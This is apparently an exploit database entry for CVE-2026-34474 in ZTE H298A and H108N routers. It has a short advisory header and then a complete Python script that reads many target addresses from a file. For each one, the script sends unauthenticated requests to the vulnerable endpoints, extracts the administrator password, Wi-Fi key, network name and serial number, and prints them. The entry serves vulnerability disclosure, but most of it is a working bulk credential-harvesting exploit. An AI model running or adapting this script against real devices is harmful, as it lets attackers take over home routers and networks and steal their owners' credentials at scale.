ZTE H298A / H108N - Unauthenticated Credential Exposure

# Exploit Title: ZTE H298A / H108N - Unauthenticated Credential Exposure
via ETHCheat Parameter
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link:
https://github.com/minanagehsalalma/cve-2026-34474-zte-h298a-h108n-sensitive-data-exposure
# Version: ZXHN H298A 1.1, ZXHN H108N 2.6
# Tested on: ZTE ZXHN H298A 1.1, ZTE ZXHN H108N 2.6
# CVE: CVE-2026-34474

# Description:
# An unauthenticated attacker can retrieve the live administrator password,
# WLAN PSK, and ESSID from a ZTE H298A or H108N router by issuing a single
# HTTP GET request to /getpage.lua?pid=1000&ETHCheat=1. The device returns
# HTML markup containing the fields OBJ_USERINFO_IDPassword1 (admin
password),
# WLANPSK_KeyPassphrase1 (Wi-Fi PSK), and WLANAP_ESSID1 in plaintext.
# A second related endpoint exposes the serial number.
# No authentication, session, or cookie is required.
#
# Affected Firmware:
# - ZXHN H298A 1.1
# - ZXHN H108N 2.6
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34474
# Full write-up:
https://github.com/minanagehsalalma/cve-2026-34474-zte-h298a-h108n-sensitive-data-exposure

import aiohttp
import asyncio
import html
import re
import os
from colorama import Fore, Style, init

init()  # Initialize colorama

async def get_essid_password(session, url):
    try:
        async with aiohttp.ClientSession() as session:
            # First request
            async with session.get("http://" + url +
"/getpage.lua?pid=1000&ETHCheat=1", verify_ssl=False) as response:
                html_text = await response.text()
                Admin =
re.search(r"id\s*=\s*'OBJ_USERINFO_IDPassword1'\s*value\s*=\s*'([^']+)'",
html_text).group(1)
                Admin = html.unescape(Admin)
                ESSID =
re.search(r"id\s*=\s*'WLANAP_ESSID1'\s*value\s*=\s*'([^']+)'",
html_text).group(1)
                ESSID = html.unescape(ESSID)
                password =
re.search(r"id\s*=\s*'WLANPSK_KeyPassphrase1'\s*value\s*=\s*'([^']+)'",
html_text).group(1)
                password = html.unescape(password)

            async with session.get("http://" + url +
"/wizard_page/wizard_overETHfail_set_lua.lua") as response:
                html_text = await response.text()
                serial_num =
re.search(r"<ParaName>SerialNumber</ParaName><ParaValue>(.*?)</ParaValue>",
html_text).group(1)
                serial_num = html.unescape(serial_num)

            return {"URL": url, "Admin Password": Admin, "ESSID": ESSID,
"WIFI-Password": password, "Serial Number": serial_num}
    except Exception as e:
        return {"URL": url, "Admin Password": "", "ESSID": "",
"WIFI-Password": "", "Serial Number": ""}

async def main():
    with open("urls.txt", "r") as f:
        urls = f.read().splitlines()
    tasks = []
    async with aiohttp.ClientSession() as session:
        for url in urls:
            tasks.append(get_essid_password(session, url))
        results = await asyncio.gather(*tasks)
    for r in results:
        print(f"[+] {r['URL']} | Admin: {r['Admin Password']} | ESSID:
{r['ESSID']} | WiFi: {r['WIFI-Password']} | Serial: {r['Serial Number']}")

if __name__ == "__main__":
    asyncio.run(main())